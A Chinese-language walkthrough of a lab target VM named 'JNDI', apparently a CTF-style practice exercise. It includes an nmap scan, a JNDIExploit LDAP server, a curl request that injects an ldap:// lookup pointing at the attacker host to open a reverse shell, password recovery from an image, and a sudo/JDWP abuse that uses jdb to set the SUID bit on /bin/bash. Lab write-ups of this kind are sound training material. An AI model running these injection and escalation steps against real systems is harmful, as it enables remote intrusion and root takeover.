群友靶机--JNDI-开发者社区

title: ‘群友靶机–JNDI’
date: 2026-03-29 21:00:28
categories: 靶机复现
tags:

靶机复现
wp
群友靶机
top_img: /img/top.jpg

JNDI

靶机名称: JNDI
作者：S@Ku_γA
靶机ID：620
难度: Medium
靶机地址: https://maze-sec.com
靶机IP: 192.168.1.183
攻击机IP: 192.168.1.195(Kali Linux)

信息收集

┌──(root㉿Gropers)-[~] └─# nmap -A -sT -p- 192.168.1.183 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-02 05:07 EDT Nmap scan report for 192.168.1.183 Host is up (0.00077s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA) | 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA) |_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519) 80/tcp open http Apache httpd 2.4.62 ((Debian)) |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.62 (Debian) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: | Supported methods: GET HEAD POST PUT DELETE OPTIONS | Potentially risky methods: PUT DELETE |_ See https://nmap.org/nsedoc/scripts/ajp-methods.html 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-title: \xE5\x88\xA9\xE5\x85\xB9\xE4\xB8\x8E\xE9\x9D\x92\xE9\xB8\x9F | \xE5\xB1\xB1\xE7\x94\xB0\xE5\xB0\x9A\xE5\xAD\x90\xE6\x89\xA7\xE5\xAF\xBC\xE7\x9A\x84\xE9\x9D\x92\xE6\x98\xA5\xE8\xAF\x97\xE7\xAF\x87 |_http-open-proxy: Proxy might be redirecting requests | http-methods: |_ Potentially risky methods: PUT DELETE |_http-server-header: Apache-Coyote/1.1 MAC Address: 08:00:27:88:D1:6A (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.77 ms 192.168.1.183 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.40 seconds

对80，8009，8080端口进行查看

看到8080端口index下有一个注释，AI提醒是凯撒密码

</p> </section> </div> <!--ptjo.pyv--> </body> </html>

ptjo.pyv --> jndi.jsp

得到了一个新网页/jndi.jsp

user–bluebird

新版 Kali 默认移除了OpenJDK 8，而很多经典漏洞利用工具（如JNDIExploit）又必须依赖Java 8的内部类

就需要使JNDIExploit绕过Java 21的模块化限制，在Java 21下通过启动参数来强制运行，并且成功向目标发送ELProcessor载荷

原理：这两个--add-exports参数告诉 Java 21：“把那些被你封锁的内部包导出来给我的工具用”。

┌──(root㉿Gropers)-[~] └─# java \ --add-exports=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \ --add-exports=java.xml/com.sun.org.apache.xalan.internal.xsltc.compiler=ALL-UNNAMED \ -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.1.195 [+] LDAP Server Start Listening on 1389... [+] HTTP Server Start Listening on 3456... [+] Received LDAP Query: Basic/ReverseShell/192.168.1.195/4444 [+] Paylaod: reverseshell [+] IP: 192.168.1.195 [+] Port: 4444 [+] Sending LDAP ResourceRef result for Basic/ReverseShell/192.168.1.195/4444 with basic remote reference payload [+] Send LDAP reference result for Basic/ReverseShell/192.168.1.195/4444 redirecting to http://192.168.1.195:3456/ExploitIgjhDwjyYb.class [+] New HTTP Request From /192.168.1.183:35142 /ExploitIgjhDwjyYb.class [+] Receive ClassRequest: ExploitIgjhDwjyYb.class [+] Response Code: 200

开启监听

nc -lvnp 4444

javax.el.ELProcessor载荷在目标机器上执行失败，我们可以尝试JNDIExploit支持的另一种利用Groovy（如果目标包含该依赖）的路径

┌──(root㉿Gropers)-[~] └─# curl -X POST http://192.168.1.183:8080/jndi.jsp \ --data-urlencode "jndi_name=ldap://192.168.1.195:1389/Basic/ReverseShell/192.168.1.195/4444"

┌──(root㉿Gropers)-[~] └─# nc -lvnp 4444 listening on [any] 4444 ... connect to [192.168.1.195] from (UNKNOWN) [192.168.1.183] 51978 bash: cannot set terminal process group (455): Inappropriate ioctl for device bash: no job control in this shell bluebird@JNDI:~$id uid=1001(bluebird) gid=1001(bluebird) groups=1001(bluebird)

成功得到了用户bluebird

user–liz

通过检查发现还有一个用户liz

bluebird@JNDI:/home$ ls -al total 16 drwxr-xr-x 4 root root 4096 Mar 23 11:40 . drwxr-xr-x 18 root root 4096 Mar 25 04:28 .. drwxr-xr-x 4 bluebird bluebird 4096 Mar 25 04:21 bluebird drwxr-xr-x 2 liz liz 4096 Mar 25 04:27 liz

进行横向转移

通过检查最新更新文件发现/usr/message/下存有一张图片message.jpg

bluebird@JNDI:/$ ls -al /usr/message/ total 876 drwxr-xr-x 2 root root 4096 Mar 24 02:27 . drwxr-xr-x 15 root root 4096 Mar 24 02:26 .. -rw-r--rwx 1 root root 888498 Mar 24 02:27 message.jpg

利用正则提取图片中有关liz的信息

bluebird@JNDI:/$ strings -a /usr/message/message.jpg | grep -i liz ilikeyousanmuximei(liz)

多次尝试得到liz的密码为sanmuximei

root

bluebird@JNDI:/$ su liz Password: liz@JNDI:/$ sudo -l [sudo] password for liz: Matching Defaults entries for liz on JNDI: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User liz may run the following commands on JNDI: (ALL) /bin/bash /opt/java_agent_start.sh liz@JNDI:/$ cat /opt/java_agent_start.sh #!/bin/bash file_name=/opt/file/tmp file_line=$(awk 'NR==1 {print;exit}' "$file_name") file_line=$(basename $file_line) cd /opt echo $file_line /usr/local/java/jdk1.8.0_20/bin/java -agentpath:/usr/local/java/jdk1.8.0_20/jre/lib/amd64/$file_line test liz@JNDI:/$

配置 JDWP 调试载荷

说明：向配置路径写入参数，开启 8888 调试端口并强制 JVM 挂起。

echo 'libjdwp.so=transport=dt_socket,server=y,suspend=y,address=8888' > /opt/file/tmp

触发 Root 调试进程

说明：以 sudo 启动脚本。注意：此窗口会进入等待状态，请保持开启。

sudo /bin/bash /opt/java_agent_start.sh

JDB 代码注入提权

说明：开启第二个靶机窗口，使用jdb注入命令。由于 JVM 以 Root 运行，执行的chmod +s将赋予 bash 最高特权。

# 连接调试端口 jdb -attach 127.0.0.1:8888 # --- 以下为 jdb 内部交互 --- stop in java.io.PrintStream.println(java.lang.String) run # (等到断点命中) print java.lang.Runtime.getRuntime().exec("chmod +s /bin/bash") resume quit